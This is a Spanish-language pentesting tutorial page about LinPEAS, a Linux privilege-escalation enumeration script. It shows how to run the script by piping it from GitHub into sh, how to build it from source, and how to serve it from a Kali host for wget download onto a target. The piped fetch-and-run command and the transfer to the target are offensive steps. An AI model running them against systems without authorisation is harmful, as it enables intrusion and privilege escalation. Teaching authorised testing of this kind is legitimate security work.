⬆️Linpeas
LinPEAS (Linux Privilege Escalation Awesome Script) es un script de bash que se utiliza para la enumeración de información en sistemas Linux con el objetivo de aumentar privilegios.
También está disponible para Windows (WinPEAS):
El script de LinPEAS está diseñado para ejecutarse en el sistema objetivo y generar un informe detallado que puede ser utilizado por los atacantes para identificar posibles vías de escalada de privilegios en el sistema Linux. LinPEAS también puede ser utilizado por los administradores de sistemas para identificar debilidades de seguridad y errores de configuración en sus sistemas y tomar medidas para corregirlos.
Nota: Este tipo de técnicas son muy invasivas, ya que vamos a comprometer y escalar privilegios en un sistema, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo
Empleo
Con conectividad a internet
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shbash linpeas.shSin conectividad a internet
Si en nuestra máquina objetivo no tenemos conectividad a internet debemos descargarnos el binario y enviarlo a la máquina objetivo:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.shO también podemos compilar el ejecutable:
Esto por ejemplo nos permite crear una versión reducida de Linpeas para que cargue solamente los módulos que queramos con el parámetro --small
Compilación del binario
afsh4ck@kali$ git clone https://github.com/peass-ng/PEASS-ng.git
afsh4ck@kali$ cd PEASS-ngNecesitamos estar en el directorio raiz del repositorio clonado o no funcionará
afsh4ck@kali$ python3 -m linPEAS.builder.linpeas_builder --output linpeas.sh
<----SIP---->
Build you own linpeas.sh
options:
-h, --help show this help message and exit
--all Build linpeas with all modules (linpeas_fat).
--all-no-fat Build linpeas with all modules except fat ones.
--no-network-scanning
Build linpeas without network scanning.
--small Build small version of linpeas.
--include INCLUDE Build linpeas only with the modules indicated you can indicate
section names or module IDs).
--exclude EXCLUDE Exclude the given modules (you can indicate section names or module
IDs).
--output OUTPUT Parth to write the final linpeas file to.afsh4ck@kali$ python3 -m linPEAS.builder.linpeas_builder --output linpeas.sh --all
[+] Downloading regexes...
Downloaded and saved in '/home/kali/Escritorio/hack-tools/PRIVESC/PEASS-ng/build_lists/regexes.yaml' successfully!
[+] Checking the syntax of the modules...
[+] 156 checks located
[+] Building temporary linpeas_base.sh with the indicated modules...
[+] Building variables...
[+] Building finds...
[+] Building storages...
[+] Checking duplicates...
[+] Building autocheck sections...
[+] Building regexes searches...
[+] Downloading external tools...
Downloading https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh...
Downloading https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl...
Downloading https://github.com/genuinetools/amicontained/releases/latest/download/amicontained-linux-amd64...
Downloading https://github.com/gitleaks/gitleaks/releases/download/v8.17.0/gitleaks_8.17.0_darwin_arm64.tar.gz...
Downloading https://github.com/gitleaks/gitleaks/releases/download/v8.17.0/gitleaks_8.17.0_linux_x64.tar.gz...
[+] Building GTFOBins lists...
[+] Final sanity checks...Si hacemos un ls veremos el binario compilado: linpeas.sh
ls
build_lists LICENSE linpeas.sh parsers TODO.md
CONTRIBUTING.md linPEAS metasploit README.md winPEASEnvio del binario a la máquina
Podemos utilizar cualquier técnica de la sección:
🔄File TransfersLo más sencillo es abrir un servidor local con python y descargarlo en el objetivo con wget:
# En Kali Linux
python3 -m http.server 80
# En la máquina objetivo
wget http://10.10.10.10/linpeas.sh
Ejecutar el binario
bash linpeas.sh
Última actualización
¿Te fue útil?